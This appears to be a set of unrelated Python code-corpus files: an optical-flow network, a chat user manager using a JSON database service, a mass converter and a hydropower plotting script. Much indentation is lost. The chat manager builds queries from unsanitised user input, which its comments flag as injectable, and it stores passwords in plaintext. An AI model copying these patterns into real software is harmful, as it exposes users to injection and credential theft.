blobs['blob153'] = self.warp(blobs['img1_nomean_resize'], blobs['blob147'])
blobs['blob154'] = blobs['img0_nomean_resize'] - blobs['blob153']
#blobs['blob155'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob154']**2, axis=3, keep_dims=True))
blobs['blob155'] = self.l2_norm(blobs['blob154'])
blobs['blob156'] = tf.concat([blobs['img0_nomean_resize'], blobs['blob146'], blobs['blob147'], blobs['blob148'], blobs['blob149'], blobs['blob152'], blobs['blob155']], axis=3)
blobs['blob157'] = tf.nn.conv2d(blobs['blob156'], self.weights['fuse_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv0_b']
blobs['blob157'] = self.leaky_relu(blobs['blob157'], 0.1)
blobs['blob158'] = tf.pad(blobs['blob157'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob158'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv1_b']
blobs['blob158'] = self.leaky_relu(blobs['blob158'], 0.1)
blobs['blob159'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv1_1_b']
blobs['blob159'] = self.leaky_relu(blobs['blob159'], 0.1)
blobs['blob160'] = tf.pad(blobs['blob159'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob160'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv2_b']
blobs['blob160'] = self.leaky_relu(blobs['blob160'], 0.1)
blobs['blob161'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv2_1_b']
blobs['blob161'] = self.leaky_relu(blobs['blob161'], 0.1)
blobs['blob162'] = tf.nn.conv2d(blobs['blob161'], self.weights['fuse__Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution5_b']
        blobs['blob163'] = tf.nn.conv2d_transpose(blobs['blob161'], self.weights['fuse_deconv1_w'], output_shape=[batch_size, ADAPTED_HEIGHT//2, ADAPTED_WIDTH//2, 32], strides=[1,2,2,1]) + self.weights['fuse_deconv1_b']
blobs['blob163'] = self.leaky_relu(blobs['blob163'], 0.1)
        blobs['blob164'] = tf.nn.conv2d_transpose(blobs['blob162'], self.weights['fuse_upsample_flow2to1_w'], output_shape=[batch_size, ADAPTED_HEIGHT//2, ADAPTED_WIDTH//2, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow2to1_b']
blobs['blob165'] = tf.concat([blobs['blob159'], blobs['blob163'], blobs['blob164']], axis=3)
blobs['blob166'] = tf.nn.conv2d(blobs['blob165'], self.weights['fuse_interconv1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv1_b']
blobs['blob167'] = tf.nn.conv2d(blobs['blob166'], self.weights['fuse__Convolution6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution6_b']
        blobs['blob168'] = tf.nn.conv2d_transpose(blobs['blob165'], self.weights['fuse_deconv0_w'], output_shape=[batch_size, ADAPTED_HEIGHT, ADAPTED_WIDTH, 16], strides=[1,2,2,1]) + self.weights['fuse_deconv0_b']
blobs['blob168'] = self.leaky_relu(blobs['blob168'], 0.1)
blobs['blob169'] = tf.nn.conv2d_transpose(blobs['blob167'], self.weights['fuse_upsample_flow1to0_w'], output_shape=[batch_size, ADAPTED_HEIGHT, ADAPTED_WIDTH, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow1to0_b']
blobs['blob170'] = tf.concat([blobs['blob157'], blobs['blob168'], blobs['blob169']], axis=3)
blobs['blob171'] = tf.nn.conv2d(blobs['blob170'], self.weights['fuse_interconv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv0_b']
blobs['blob172'] = tf.nn.conv2d(blobs['blob171'], self.weights['fuse__Convolution7_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution7_b']
blobs['predict_flow_resize'] = tf.image.resize_bilinear(blobs['blob172'], size=[TARGET_HEIGHT, TARGET_WIDTH], align_corners=True)
scale = tf.stack([SCALE_WIDTH, SCALE_HEIGHT])
scale = tf.reshape(scale, [1,1,1,2])
blobs['predict_flow_final'] = scale*blobs['predict_flow_resize']
self.blobs = blobs
return blobs
def all_variables(self):
return [('netsd_deconv5_w', (4, 4, 512, 1024)),
('netsd_conv1_b', (64,)),
('netsd_upsample_flow5to4_w', (4, 4, 2, 2)),
('conv2_b', (128,)),
('fuse__Convolution5_w', (3, 3, 128, 2)),
('netsd_conv4_1_w', (3, 3, 512, 512)),
('netsd_interconv3_w', (3, 3, 386, 128)),
('netsd_deconv4_w', (4, 4, 256, 1026)),
('deconv4_b', (256,)),
('fuse_interconv0_w', (3, 3, 82, 16)),
('netsd_Convolution2_b', (2,)),
('net3_conv4_b', (512,)),
('net3_conv3_b', (256,)),
('net3_predict_conv2_w', (3, 3, 194, 2)),
('net3_predict_conv3_b', (2,)),
('conv6_1_w', (3, 3, 1024, 1024)),
('fuse_upsample_flow2to1_b', (2,)),
('Convolution1_w', (3, 3, 1024, 2)),
('net3_deconv3_w', (4, 4, 128, 770)),
('net2_deconv3_b', (128,)),
('fuse_conv1_w', (3, 3, 64, 64)),
('conv5_w', (3, 3, 512, 512)),
('Convolution4_w', (3, 3, 386, 2)),
('fuse_conv0_b', (64,)),
('net2_conv3_w', (5, 5, 128, 256)),
('upsample_flow4to3_b', (2,)),
('netsd_conv4_1_b', (512,)),
('fuse_upsample_flow2to1_w', (4, 4, 2, 2)),
('netsd_conv4_b', (512,)),
('net2_net2_upsample_flow3to2_b', (2,)),
('net3_predict_conv4_b', (2,)),
('fuse_upsample_flow1to0_b', (2,)),
('conv4_1_w', (3, 3, 512, 512)),
('deconv2_b', (64,)),
('net2_conv4_1_w', (3, 3, 512, 512)),
('net3_deconv4_w', (4, 4, 256, 1026)),
('net2_deconv5_b', (512,)),
('netsd_deconv5_b', (512,)),
('net2_deconv2_b', (64,)),
('net3_conv2_b', (128,)),
('conv_redir_w', (1, 1, 256, 32)),
('fuse_conv1_1_b', (128,)),
('net2_deconv5_w', (4, 4, 512, 1024)),
('net2_conv5_b', (512,)),
('net2_conv4_w', (3, 3, 256, 512)),
('net2_predict_conv6_w', (3, 3, 1024, 2)),
('netsd_conv5_b', (512,)),
('deconv4_w', (4, 4, 256, 1026)),
('net2_net2_upsample_flow4to3_b', (2,)),
('fuse__Convolution6_w', (3, 3, 32, 2)),
('net3_deconv2_w', (4, 4, 64, 386)),
('net2_conv6_1_w', (3, 3, 1024, 1024)),
('netsd_conv0_b', (64,)),
('netsd_conv5_1_w', (3, 3, 512, 512)),
('net2_conv6_1_b', (1024,)),
('net3_conv2_w', (5, 5, 64, 128)),
('net3_predict_conv6_w', (3, 3, 1024, 2)),
('net3_conv4_1_b', (512,)),
('net3_net3_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_deconv2_w', (4, 4, 64, 386)),
('deconv3_b', (128,)),
('netsd_interconv5_b', (512,)),
('net2_conv3_1_w', (3, 3, 256, 256)),
('netsd_interconv4_w', (3, 3, 770, 256)),
('net3_deconv3_b', (128,)),
('fuse_conv0_w', (3, 3, 11, 64)),
('net3_predict_conv6_b', (2,)),
('fuse_upsample_flow1to0_w', (4, 4, 2, 2)),
('netsd_deconv3_b', (128,)),
('net3_predict_conv5_w', (3, 3, 1026, 2)),
('netsd_conv5_w', (3, 3, 512, 512)),
('netsd_interconv5_w', (3, 3, 1026, 512)),
('netsd_Convolution3_w', (3, 3, 256, 2)),
('net2_predict_conv4_w', (3, 3, 770, 2)),
('deconv2_w', (4, 4, 64, 386)),
('net3_predict_conv5_b', (2,)),
('fuse__Convolution5_b', (2,)),
('fuse__Convolution7_w', (3, 3, 16, 2)),
('net2_net2_upsample_flow6to5_w', (4, 4, 2, 2)),
('netsd_conv3_b', (256,)),
('net3_conv6_w', (3, 3, 512, 1024)),
('net3_conv1_b', (64,)),
('netsd_Convolution4_b', (2,)),
('net3_conv3_w', (5, 5, 128, 256)),
('netsd_conv0_w', (3, 3, 6, 64)),
('net2_conv4_b', (512,)),
('net2_predict_conv3_w', (3, 3, 386, 2)),
('net3_net3_upsample_flow3to2_w', (4, 4, 2, 2)),
('fuse_conv1_1_w', (3, 3, 64, 128)),
('deconv5_b', (512,)),
('fuse__Convolution7_b', (2,)),
('net3_conv6_1_w', (3, 3, 1024, 1024)),
('net3_net3_upsample_flow5to4_w', (4, 4, 2, 2)),
('net3_conv4_w', (3, 3, 256, 512)),
('upsample_flow5to4_w', (4, 4, 2, 2)),
('conv4_1_b', (512,)),
('img0s_aug_b', (320, 448, 3, 1)),
('conv5_1_b', (512,)),
('net3_conv4_1_w', (3, 3, 512, 512)),
('upsample_flow5to4_b', (2,)),
('net3_conv3_1_b', (256,)),
('Convolution1_b', (2,)),
('upsample_flow4to3_w', (4, 4, 2, 2)),
('conv5_1_w', (3, 3, 512, 512)),
('conv3_1_b', (256,)),
('conv3_w', (5, 5, 128, 256)),
('net2_conv2_b', (128,)),
('net3_net3_upsample_flow6to5_w', (4, 4, 2, 2)),
('upsample_flow3to2_b', (2,)),
('netsd_Convolution5_w', (3, 3, 64, 2)),
('netsd_interconv2_w', (3, 3, 194, 64)),
('net2_predict_conv6_b', (2,)),
('net2_deconv4_w', (4, 4, 256, 1026)),
('scale_conv1_b', (2,)),
('net2_net2_upsample_flow5to4_w', (4, 4, 2, 2)),
('netsd_conv2_b', (128,)),
('netsd_conv2_1_b', (128,)),
('netsd_upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_predict_conv5_b', (2,)),
('net3_conv6_1_b', (1024,)),
('netsd_conv6_w', (3, 3, 512, 1024)),
('Convolution4_b', (2,)),
('net2_predict_conv4_b', (2,)),
('fuse_deconv1_b', (32,)),
('conv3_1_w', (3, 3, 473, 256)),
('net3_deconv2_b', (64,)),
('netsd_conv6_b', (1024,)),
('net2_conv5_1_w', (3, 3, 512, 512)),
('net3_conv5_1_w', (3, 3, 512, 512)),
('deconv5_w', (4, 4, 512, 1024)),
('fuse_conv2_b', (128,)),
('netsd_conv1_1_b', (128,)),
('netsd_upsample_flow6to5_b', (2,)),
('Convolution5_w', (3, 3, 194, 2)),
('scale_conv1_w', (1, 1, 2, 2)),
('net2_net2_upsample_flow5to4_b', (2,)),
('conv6_1_b', (1024,)),
('fuse_conv2_1_b', (128,)),
('netsd_Convolution5_b', (2,)),
('netsd_conv3_1_b', (256,)),
('conv2_w', (5, 5, 64, 128)),
('fuse_conv2_w', (3, 3, 128, 128)),
('net2_conv2_w', (5, 5, 64, 128)),
('conv3_b', (256,)),
('net3_deconv5_w', (4, 4, 512, 1024)),
('img1s_aug_w', (1, 1, 1, 1)),
('netsd_conv2_w', (3, 3, 128, 128)),
('conv6_w', (3, 3, 512, 1024)),
('netsd_conv4_w', (3, 3, 256, 512)),
('net2_conv1_w', (7, 7, 12, 64)),
('netsd_Convolution1_w', (3, 3, 1024, 2)),
('netsd_conv1_w', (3, 3, 64, 64)),
('netsd_deconv4_b', (256,)),
('conv4_w', (3, 3, 256, 512)),
('conv5_b', (512,)),
('net3_deconv5_b', (512,)),
('netsd_interconv3_b', (128,)),
('net3_conv3_1_w', (3, 3, 256, 256)),
('net2_predict_conv5_w', (3, 3, 1026, 2)),
('Convolution3_b', (2,)),
('netsd_conv5_1_b', (512,)),
('netsd_interconv4_b', (256,)),
('conv4_b', (512,)),
('net3_net3_upsample_flow6to5_b', (2,)),
('Convolution5_b', (2,)),
('fuse_conv2_1_w', (3, 3, 128, 128)),
('net3_net3_upsample_flow4to3_b', (2,)),
('conv1_w', (7, 7, 3, 64)),
('upsample_flow6to5_b', (2,)),
('conv6_b', (1024,)),
('netsd_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_deconv3_w', (4, 4, 128, 770)),
('netsd_conv2_1_w', (3, 3, 128, 128)),
('netsd_Convolution3_b', (2,)),
('netsd_upsample_flow4to3_w', (4, 4, 2, 2)),
('fuse_interconv1_w', (3, 3, 162, 32)),
('netsd_upsample_flow4to3_b', (2,)),
('netsd_conv3_1_w', (3, 3, 256, 256)),
('netsd_deconv3_w', (4, 4, 128, 770)),
('net3_conv5_b', (512,)),
('net3_conv5_1_b', (512,)),
('net2_net2_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_conv3_b', (256,)),
('netsd_conv6_1_w', (3, 3, 1024, 1024)),
('fuse_deconv0_b', (16,)),
('net2_predict_conv2_w', (3, 3, 194, 2)),
('net2_conv1_b', (64,)),
('net2_conv6_b', (1024,)),
('net3_predict_conv2_b', (2,)),
('net2_conv4_1_b', (512,)),
('netsd_Convolution4_w', (3, 3, 128, 2)),
('deconv3_w', (4, 4, 128, 770)),
('fuse_deconv1_w', (4, 4, 32, 128)),
('netsd_Convolution2_w', (3, 3, 512, 2)),
('netsd_Convolution1_b', (2,)),
('net2_conv3_1_b', (256,)),
('fuse_conv1_b', (64,)),
('net2_deconv4_b', (256,)),
('net3_predict_conv4_w', (3, 3, 770, 2)),
('Convolution3_w', (3, 3, 770, 2)),
('netsd_upsample_flow3to2_b', (2,)),
('net3_net3_upsample_flow3to2_b', (2,)),
('fuse_interconv0_b', (16,)),
('Convolution2_w', (3, 3, 1026, 2)),
('net2_conv6_w', (3, 3, 512, 1024)),
('netsd_conv3_w', (3, 3, 128, 256)),
('netsd_upsample_flow5to4_b', (2,)),
('net3_predict_conv3_w', (3, 3, 386, 2)),
('conv_redir_b', (32,)),
('net2_conv5_1_b', (512,)),
('upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow6to5_b', (2,)),
('net3_conv6_b', (1024,)),
('fuse__Convolution6_b', (2,)),
('Convolution2_b', (2,)),
('upsample_flow3to2_w', (4, 4, 2, 2)),
('net3_conv1_w', (7, 7, 12, 64)),
('fuse_deconv0_w', (4, 4, 16, 162)),
('img0s_aug_w', (1, 1, 1, 1)),
('netsd_conv1_1_w', (3, 3, 64, 128)),
('netsd_deconv2_b', (64,)),
('net2_conv5_w', (3, 3, 512, 512)),
('fuse_interconv1_b', (32,)),
('netsd_conv6_1_b', (1024,)),
('netsd_interconv2_b', (64,)),
('img1s_aug_b', (320, 448, 3, 1)),
('netsd_deconv2_w', (4, 4, 64, 386)),
('net2_predict_conv3_b', (2,)),
('net2_predict_conv2_b', (2,)),
('net3_deconv4_b', (256,)),
('net3_net3_upsample_flow5to4_b', (2,)),
('conv1_b', (64,)),
('net3_conv5_w', (3, 3, 512, 512))]
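

if __name__ == "__main__":
    # Hedged, standalone sketch (not part of the original model code): the
    # graph above looks up every kernel/bias in self.weights by the names
    # listed in all_variables().  The snippet below shows one way such a
    # dict of variables could be built from (name, shape) pairs; only two
    # entries are used here so it stays self-contained.
    import numpy as np
    example_shapes = [('conv1_w', (7, 7, 3, 64)), ('conv1_b', (64,))]
    example_weights = {
        name: tf.Variable(np.zeros(shape, dtype=np.float32), name=name)
        for name, shape in example_shapes
    }
    print({name: var.shape for name, var in example_weights.items()})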
|
StarcoderdataPython
|
4819309
|
import sys
sys.path.append(".")
from Model.jsn_drop_service import jsnDrop
from time import gmtime
class UserManager(object):
current_user = None
current_pass = None
current_status = None
current_screen = None
stop_thread = False
chat_list = None
this_user_manager = None
def now_time_stamp(self):
time_now = gmtime()
        timestamp_str = f"{time_now.tm_year}-{time_now.tm_mon:02d}-{time_now.tm_mday:02d} {time_now.tm_hour:02d}:{time_now.tm_min:02d}:{time_now.tm_sec:02d}"
return timestamp_str
def __init__(self) -> None:
super().__init__()
self.jsnDrop = jsnDrop("dd6fb593-50ea-4463-bf56-e92e240a45cc","https://newsimland.com/~todd/JSON")
# SCHEMA Make sure the tables are CREATED - jsnDrop does not wipe an existing table if it is recreated
result = self.jsnDrop.create("tblUser",{"PersonID PK":"A_LOOONG_NAME"+('X'*50),
"Password":"<PASSWORD>"+('X'*50),
"Status":"STATUS_STRING",
"DesNo": 10})
result = self.jsnDrop.create("tblChat",{"Time PK": self.now_time_stamp()+('X'*50),
"PersonID":"A_LOOONG_NAME"+('X'*50),
"DesNo":10,
"Chat":"A_LOONG____CHAT_ENTRY"+('X'*255)})
UserManager.this_user_manager = self
def register(self, user_id, password):
api_result = self.jsnDrop.select("tblUser",f"PersonID = '{user_id}'") # Danger SQL injection attack via user_id?? Is JsnDrop SQL injection attack safe??
if( "DATA_ERROR" in self.jsnDrop.jsnStatus): # we get a DATA ERROR on an empty list - this is a design error in jsnDrop
# Is this where our password should be SHA'ed !?
result = self.jsnDrop.store("tblUser",[{'PersonID':user_id,'Password':password,'Status':'Registered', "DesNo": 0}])
            UserManager.current_user = user_id
UserManager.current_status = 'Logged Out'
result = "Registration Success"
else:
result = "User Already Exists"
return result
def login(self, user_id, password):
result = None
api_result = self.jsnDrop.select("tblUser",f"PersonID = '{user_id}' AND Password = '{password}'") # Danger SQL injection attack via user_id?? Is JsnDrop SQL injection attack safe??
api_result1 = self.jsnDrop.select("tblUser",f"PersonID = '{user_id}' AND Status = 'Logged In'")
        if "Data error" not in api_result1:  # no data error here means this user is already logged in
result = "User has already logged in"
UserManager.current_status = "Logged Out"
UserManager.current_user = None
        elif "Data error" in api_result:  # the (user_id, password) pair does not exist - bad login
result = "Wrong username or password"
UserManager.current_status = "Logged Out"
UserManager.current_user = None
else:
UserManager.current_status = "Logged In"
UserManager.current_user = user_id
UserManager.current_pass = password
api_result = self.jsnDrop.store("tblUser",[{"PersonID":user_id,"Password":password,"Status":"Logged In", "DesNo": 0}])
result = "Login Success"
return result
def get_online_user(self):
api_result = self.jsnDrop.select("tblUser", "Status = 'Logged In'")
online_user = []
for value in api_result:
online_user.append(value['PersonID'])
return online_user
def get_des_user(self, DesNo):
api_result = self.jsnDrop.select("tblUser", f"Status = 'Logged In' AND DesNo = {DesNo}")
des_user = []
for value in api_result:
des_user.append(value['PersonID'])
return des_user
def set_current_DES(self, DesNo):
result = None
if UserManager.current_status == "Logged In":
user_id = UserManager.current_user
password = UserManager.current_pass
api_result = self.jsnDrop.store("tblUser",[{"PersonID":user_id,"Password":password,"Status":"Logged In", "DesNo": DesNo}])
UserManager.current_screen = DesNo
result = "Set Screen"
else:
result = "Log in to set the current screen"
return result
def logout(self):
result = "Must be 'Logged In' to 'LogOut' "
if UserManager.current_status == "Logged In":
            api_result = self.jsnDrop.store("tblUser",[{"PersonID": UserManager.current_user,
                                                        "Password": UserManager.current_pass,
                                                        "Status": "Logged Out",
                                                        "DesNo": 0}])
if not("ERROR" in api_result):
UserManager.current_status = "Logged Out"
result = "Logged Out"
else:
result = self.jsnDrop.jsnStatus
return result
def send_chat(self, message):
result = None
if UserManager.current_status != "Logged In":
result = "Please log in to chat"
elif UserManager.current_screen == None:
result = "Chat not sent. Not in DES"
else:
user_id = UserManager.current_user
des_screen = UserManager.current_screen
api_result = self.jsnDrop.store("tblChat",[{"Time": self.now_time_stamp(),
"PersonID": user_id,
"DesNo": f'{des_screen}',
"Chat": message}])
if "STORE tblChat executed" in api_result:
result = "Chat sent"
else:
result = self.jsnDrop.jsnStatus
return result
def get_chat(self, DesNo):
api_result = self.jsnDrop.select("tblChat", f"DesNo = {DesNo}")
chat_lists = []
messages = ""
if not 'Data error' in api_result:
sorted_chats = sorted(api_result, key=lambda i: i['Time'])
if len(sorted_chats) >= 5:
chat_lists = sorted_chats[-5:]
for value in chat_lists:
msg_string = f"[{value['PersonID']}]:{value['Chat']} \t(sent at {value['Time']})\n"
messages += msg_string
else:
for value in sorted_chats:
msg_string = f"[{value['PersonID']}]:{value['Chat']} \t(sent at {value['Time']})\n"
messages += msg_string
else:
messages = ""
return messages
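

if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module).  The user name,
    # password and DES screen number below are made-up illustration values,
    # and every call needs network access to the jsnDrop service configured
    # in __init__.
    manager = UserManager()
    print(manager.register("demo_user", "demo_pass"))
    print(manager.login("demo_user", "demo_pass"))
    print(manager.set_current_DES(1))
    print(manager.send_chat("Hello from the usage sketch"))
    print(manager.get_chat(1))
    print(manager.logout())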
|
StarcoderdataPython
|
3335110
|
<filename>utils.py<gh_stars>1-10
import json
from settings import MASS_UNITS
def convert_mass(mass, from_unit, to_unit):
if from_unit == to_unit:
return mass
# from kg to ...
if from_unit == MASS_UNITS[0]:
if to_unit == MASS_UNITS[1]:
return mass * 1.e3
elif to_unit == MASS_UNITS[2]:
return mass * 1.e6
elif to_unit == MASS_UNITS[3]:
return mass * 1.e9
elif to_unit == MASS_UNITS[4]:
return mass * 1.e12
# from g to ...
if from_unit == MASS_UNITS[1]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-3
elif to_unit == MASS_UNITS[2]:
return mass * 1.e3
elif to_unit == MASS_UNITS[3]:
return mass * 1.e6
elif to_unit == MASS_UNITS[4]:
return mass * 1.e9
# from mg to ...
if from_unit == MASS_UNITS[2]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-6
elif to_unit == MASS_UNITS[1]:
return mass * 1.e-3
elif to_unit == MASS_UNITS[3]:
return mass * 1.e3
elif to_unit == MASS_UNITS[4]:
return mass * 1.e6
# from ug to ...
if from_unit == MASS_UNITS[3]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-9
elif to_unit == MASS_UNITS[1]:
return mass * 1.e-6
elif to_unit == MASS_UNITS[2]:
return mass * 1.e-3
elif to_unit == MASS_UNITS[4]:
return mass * 1.e3
# from ng to ...
if from_unit == MASS_UNITS[4]:
if to_unit == MASS_UNITS[0]:
return mass * 1.e-12
elif to_unit == MASS_UNITS[1]:
return mass * 1.e-9
elif to_unit == MASS_UNITS[2]:
return mass * 1.e-6
elif to_unit == MASS_UNITS[3]:
return mass * 1.e-3
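

if __name__ == "__main__":
    # Hedged usage sketch: judging from the branches above, MASS_UNITS is
    # ordered [kg, g, mg, ug, ng].  Indices are used here so the exact unit
    # strings defined in settings.py do not need to be assumed.
    kg, mg = MASS_UNITS[0], MASS_UNITS[2]
    print(convert_mass(2.5, kg, mg))  # 2.5 kg -> 2500000.0 mg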
|
StarcoderdataPython
|
4807766
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 21 16:43:56 2020
@author: ssterl
"""
##########################################
######### REVUB plotting results #########
##########################################
# REVUB model © 2019 CIREG project
# Author: <NAME>, <NAME>
# This code accompanies the paper "Turbines of the Caribbean: Decarbonising Suriname's electricity mix through hydro-supported integration of wind power" by Sterl et al.
# All equation, section &c. numbers refer to the official REVUB manual (see corresponding GitHub page, https://github.com/VUB-HYDR/REVUB).
import numpy as np
import pandas as pd
import numbers as nb
import matplotlib.pyplot as plt
import numpy.matlib
# [set by user] select hydropower plant (starting count at zero) and year (starting count at zero) for which to display results
plot_HPP_multiple = np.array([0])
plot_year_multiple = 0
# [set by user] select month of year (1 = Jan, 2 = Feb, &c.) and day of month, and number of days to display results
plot_month_multiple = 1
plot_day_month_multiple = 14
plot_num_days_multiple = 3
# [set by user] total electricity demand to be met (MW)
P_total_av = 146.84 # MW
E_total_av = (1e-3)*P_total_av*hrs_day*365 # GWh/year
P_total_hourly = P_total_av*L_norm[:,:,0] # MW
# [calculate] non-hydro-solar-wind (thermal) power contribution (difference between total and hydro-solar-wind)
P_BAL_thermal_hourly = P_total_hourly - np.nansum(P_BAL_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_BAL_wind_hourly[:,:,plot_HPP_multiple] + P_BAL_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple], axis = 2)
P_STOR_thermal_hourly = P_total_hourly - np.nansum(P_STOR_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_STOR_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_STOR_wind_hourly[:,:,plot_HPP_multiple] + P_STOR_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple] - P_STOR_pump_hourly[:,:,plot_HPP_multiple], axis = 2)
P_BAL_thermal_hourly[P_BAL_thermal_hourly < 0] = 0
P_STOR_thermal_hourly[P_STOR_thermal_hourly < 0] = 0
# [calculate] excess (to-be-curtailed) power
P_BAL_curtailed_hourly = np.nansum(P_BAL_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_BAL_wind_hourly[:,:,plot_HPP_multiple] + P_BAL_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple], axis = 2) + P_BAL_thermal_hourly - P_total_hourly
P_STOR_curtailed_hourly = np.nansum(P_STOR_hydro_stable_hourly[:,:,plot_HPP_multiple] + P_STOR_hydro_flexible_hourly[:,:,plot_HPP_multiple] + P_STOR_wind_hourly[:,:,plot_HPP_multiple] + P_STOR_solar_hourly[:,:,plot_HPP_multiple] + P_BAL_hydro_RoR_hourly[:,:,plot_HPP_multiple] - P_STOR_pump_hourly[:,:,plot_HPP_multiple], axis = 2) + P_STOR_thermal_hourly - P_total_hourly
# [preallocate] extra variables for thermal power generation assessment
E_total_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_thermal_BAL_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_thermal_STOR_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_curtailed_BAL_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
E_curtailed_STOR_bymonth = np.zeros(shape = (months_yr,len(simulation_years)))
# [loop] across all years in the simulation
for y in range(len(simulation_years)):
# [loop] across all months of the year, converting hourly values (MW or MWh/h) to GWh/month (see eq. S24, S25)
for m in range(months_yr):
E_total_bymonth[m,y] = 10**(-3)*np.sum(P_total_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_thermal_BAL_bymonth[m,y] = 10**(-3)*np.sum(P_BAL_thermal_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_thermal_STOR_bymonth[m,y] = 10**(-3)*np.sum(P_STOR_thermal_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_curtailed_BAL_bymonth[m,y] = 10**(-3)*np.sum(P_BAL_curtailed_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
E_curtailed_STOR_bymonth[m,y] = 10**(-3)*np.sum(P_STOR_curtailed_hourly[int(positions[m,y]):int(positions[m+1,y]),y])
# [read] vector with hours in each year
hrs_year = range(int(hrs_byyear[plot_year_multiple]))
# [identify] index of day of month to plot
plot_day_load = np.sum(days_year[range(plot_month_multiple - 1),plot_year_multiple]) + plot_day_month_multiple - 1
# [strings] string arrays containing the names and abbreviations of the different months
months_names_full = np.array(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"])
months_names_short = np.array(["J", "F", "M", "A", "M", "J", "J", "A", "S", "O", "N", "D"])
months_byyear = np.empty(shape = (months_yr,len(simulation_years)), dtype = 'object')
# [arrange] create string for each month-year combination in the time series
for y in range(len(simulation_years)):
for m in range(months_yr):
        months_byyear[m,y] = months_names_full[m] + str(simulation_years[y])
# [arrange] create string for each day-month-year combination in the time series
days_bymonth_byyear = np.empty(shape = (int(np.max(days_year)), months_yr,len(simulation_years)), dtype = 'object')
for y in range(len(simulation_years)):
for m in range(months_yr):
for d in range(int(days_year[m,y])):
            days_bymonth_byyear[d,m,y] = str(d+1) + months_names_full[m] + 'Yr' + str(y+1)
days_bymonth_byyear_axis = (np.transpose(days_bymonth_byyear[:,:,plot_year_multiple])).ravel()
days_bymonth_byyear_axis = list(filter(None, days_bymonth_byyear_axis))
# [colours] for plotting
colour_hydro_stable = np.array([55, 126, 184]) / 255
colour_hydro_flexible = np.array([106, 226, 207]) / 255
colour_solar = np.array([255, 255, 51]) / 255
colour_wind = np.array([77, 175, 74]) / 255
colour_hydro_RoR = np.array([100, 100, 100]) / 255
colour_hydro_pumped = np.array([77, 191, 237]) / 255
colour_thermal = np.array([75, 75, 75]) / 255
colour_curtailed = np.array([200, 200, 200]) / 255
# [figure] (cf. Fig. S4a, S9a)
# [plot] average monthly power mix in user-selected year
fig = plt.figure()
area_mix_BAL_bymonth = [np.nansum(E_hydro_BAL_stable_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_BAL_flexible_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_wind_BAL_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1) - E_curtailed_BAL_bymonth[:,plot_year_multiple], np.nansum(E_solar_BAL_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_BAL_RoR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), E_thermal_BAL_bymonth[:,plot_year_multiple], E_curtailed_BAL_bymonth[:,plot_year_multiple]]/days_year[:,plot_year_multiple]*10**3/hrs_day
labels_generation_BAL = ['Hydropower (stable)', 'Hydropower (flexible)', 'Wind power', 'Solar power', 'Hydropower (RoR)', 'Thermal', 'Curtailed VRE']
plt.stackplot(np.array(range(months_yr)), area_mix_BAL_bymonth, labels = labels_generation_BAL, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.plot(np.array(range(months_yr)), E_total_bymonth[:,plot_year_multiple]/days_year[:,plot_year_multiple]*10**3/hrs_day, label = 'Total load', color = 'black', linewidth = 3)
